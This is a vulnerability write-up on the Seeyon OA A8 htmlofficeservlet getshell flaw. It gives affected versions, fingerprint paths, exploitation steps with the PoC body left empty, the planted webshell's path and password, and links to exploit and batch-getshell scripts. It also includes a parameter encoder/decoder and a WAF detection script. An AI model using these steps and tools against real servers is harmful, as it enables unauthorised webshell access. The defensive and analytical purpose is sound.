Seeyon OA A8 htmlofficeservlet getshell vulnerability


0x00 Vulnerability overview

Seeyon OA has a large user base in China; the htmlofficeservlet getshell vulnerability was disclosed during the 2019 attack-and-defense exercises.

0x01 Affected components

Seeyon A8-V5 Collaborative Management Software V6.1sp1
Seeyon A8+ Collaborative Management Software V7.0, V7.0sp1, V7.0sp2, V7.0sp3
Seeyon A8+ Collaborative Management Software V7.1

0x02 Vulnerability fingerprints

/seeyon/htmlofficeservlet
/seeyon/index.jsp
seeyon
Fofa:app="用友-致遠OA"

0x03 Vulnerability analysis

Seeyon OA A8 htmlofficeservlet getshell (POC&EXP) – Reber's Blog
http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/

0x04 Exploitation

Step 1: visit /seeyon/htmlofficeservlet
If the content shown in the figure below appears, the vulnerability is present.

Step 2: construct the PoC
Base64-decoding the PoC below gives the body of the POST request:



Step 3: visit the webshell
The webshell is located at /seeyon/test123456.jsp; the password is asasd3344.

Python script, reference link: https://github.com/nian-hua/CVEScript/blob/master/致遠OA/zhiyuan.py

Other

timwhitez/seeyon-OA-A8-GetShell: batch getshell for certain Seeyon OA A8 versions / seeyon OA A8 some version getshell from url list
https://github.com/timwhitez/seeyon-OA-A8-GetShell

Seeyon OA A8 htmlofficeservlet getshell (POC&EXP) – Reber's Blog
http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/

There is also an XXE in this product:

Discovery process of a pre-auth XXE vulnerability (0day) in the Seeyon OA FanRuan report component, LandGrey's Blog
https://landgrey.me/blog/8/

0x05 Exploitation notes

1. This vulnerability is also quite interesting: the endpoint belongs to Kinggrid (金格) iWebOffice and is used for handling files, so this is a security issue caused by an exposed third-party interface.

The scripts circulating online for this vulnerability all use the file name test123456.jsp, which makes them very easy to spot.

Here is a small script that encodes and decodes the file-name attribute and similar fields. The algorithm is simple (I wrote this the day the advisory came out): it is just base64 with a substituted alphabet.

from sys import argv

# The servlet's symbol table: the standard base64 alphabet permuted. Note that '='
# sits at index 32, so the encoder can emit '=' as a data symbol as well as padding;
# the decoder below treats every '=' as padding, so such strings decode incorrectly.
letters = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"


def base64_encode(input_str):
    # Each character as an 8-bit binary string (ASCII input only).
    str_ascii_list = ['{:0>8}'.format(str(bin(ord(i))).replace('0b', ''))
                      for i in input_str]
    output_str = ''
    equal_num = 0
    while str_ascii_list:
        # Take three bytes; pad a short final group with zero bytes and remember how many.
        temp_list = str_ascii_list[:3]
        if len(temp_list) != 3:
            while len(temp_list) < 3:
                equal_num += 1
                temp_list += ['0' * 8]
        # Split the 24 bits into four 6-bit indexes into the custom alphabet.
        temp_str = ''.join(temp_list)
        temp_str_list = [temp_str[x:x + 6] for x in [0, 6, 12, 18]]
        temp_str_list = [int(x, 2) for x in temp_str_list]
        if equal_num:
            temp_str_list = temp_str_list[0:4 - equal_num]
        output_str += ''.join([letters[x] for x in temp_str_list])
        str_ascii_list = str_ascii_list[3:]
    output_str = output_str + '=' * equal_num
    return output_str


def base64_decode(input_str):
    # Each symbol back to its 6-bit index; '=' is skipped as padding.
    str_ascii_list = ['{:0>6}'.format(str(bin(letters.index(i))).replace('0b', ''))
                      for i in input_str if i != '=']
    output_str = ''
    equal_num = input_str.count('=')
    while str_ascii_list:
        temp_list = str_ascii_list[:4]
        temp_str = ''.join(temp_list)
        # A short final group carries two filler bits per padding symbol; drop them.
        if len(temp_str) % 8 != 0:
            temp_str = temp_str[0:-1 * equal_num * 2]
        temp_str_list = [temp_str[x:x + 8] for x in [0, 8, 16]]
        temp_str_list = [int(x, 2) for x in temp_str_list if x]
        output_str += ''.join([chr(x) for x in temp_str_list])
        str_ascii_list = str_ascii_list[4:]
    return output_str


if __name__ == "__main__":
    if len(argv) == 2:
        print(base64_decode(argv[1]))
    elif len(argv) == 3:
        if argv[1] == '-d':
            print(base64_decode(argv[2]))
        else:
            print(base64_encode(argv[2]))
    else:
        print("Seeyon OA /seeyon/htmlofficeservlet param encode/decode")
        print("Usage:")
        print("python %s encoded_str" % argv[0])
        print("python %s -d encoded_str" % argv[0])
        print("python %s -e raw_str" % argv[0])

Mitigation

1. Apply the vendor patch promptly

2. Block the requests with a WAF
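What a WAF rule or log-review script for this mitigation has to do is undo the substituted-alphabet base64 from the script above and look at the file name it hides. The following is an added example, not code from the original post or from any Seeyon or Kinggrid tool: it maps the page's alphabet onto standard base64 with str.translate, decodes the file-name field and flags requests to the fingerprint path that would write a .jsp or .jspx. The record shape (path plus the already extracted encoded file-name field) and the sample names are constructed assumptions.

```python
import base64
import re

# Alphabet as listed in the script above: 65 symbols, '=' at index 32. The encoder
# only indexes 0..63, so '6' (index 64) is never emitted and '=' is both data symbol
# 32 and padding; that ambiguity belongs to the scheme, not to this code.
SEEYON_ALPHABET = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
TO_STD = str.maketrans(SEEYON_ALPHABET[:64], STD_ALPHABET)
TO_SEEYON = str.maketrans(STD_ALPHABET, SEEYON_ALPHABET[:64])

SERVLET_PATH = "/seeyon/htmlofficeservlet"      # fingerprint path from the page
JSP_NAME = re.compile(r"\.jspx?$", re.IGNORECASE)

def encode_seeyon(raw: bytes) -> str:
    """Standard base64, then the data symbols remapped; padding '=' is kept as-is."""
    std = base64.b64encode(raw).decode("ascii")
    body = std.rstrip("=")
    return body.translate(TO_SEEYON) + "=" * (len(std) - len(body))

def decode_seeyon(encoded: str) -> bytes:
    """Inverse of encode_seeyon. Trailing '=' (at most two) is taken as padding."""
    body = encoded.rstrip("=")
    pad = min(len(encoded) - len(body), 2)
    return base64.b64decode(body.translate(TO_STD) + "=" * pad)

def is_jsp_upload(path: str, encoded_name: str) -> bool:
    """True when a request to the servlet carries a name decoding to .jsp/.jspx."""
    if path != SERVLET_PATH:
        return False
    try:
        name = decode_seeyon(encoded_name).decode("utf-8", "replace")
    except ValueError:            # binascii.Error is a ValueError: undecodable field
        return False
    return JSP_NAME.search(name) is not None

def scan(records):
    """Return the indexes of (path, encoded_name) records that should be alerted on."""
    return [i for i, (path, enc) in enumerate(records) if is_jsp_upload(path, enc)]

# Constructed sample records (assumed shape: request path plus the encoded file-name
# field pulled out of the body); the names are encoded with the scheme above.
SAMPLE_RECORDS = [
    ("/seeyon/htmlofficeservlet", encode_seeyon(b"report.doc")),
    ("/seeyon/htmlofficeservlet", encode_seeyon(b"test123456.jsp")),
    ("/seeyon/index.jsp", encode_seeyon(b"anything.jsp")),      # not the servlet path
]

print(scan(SAMPLE_RECORDS))       # [1]
```

Because '=' is also data symbol 32, a field whose last data symbol is '=' cannot be told apart from padding by any decoder; a production rule should treat an undecodable field as suspicious rather than silently ignore it.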

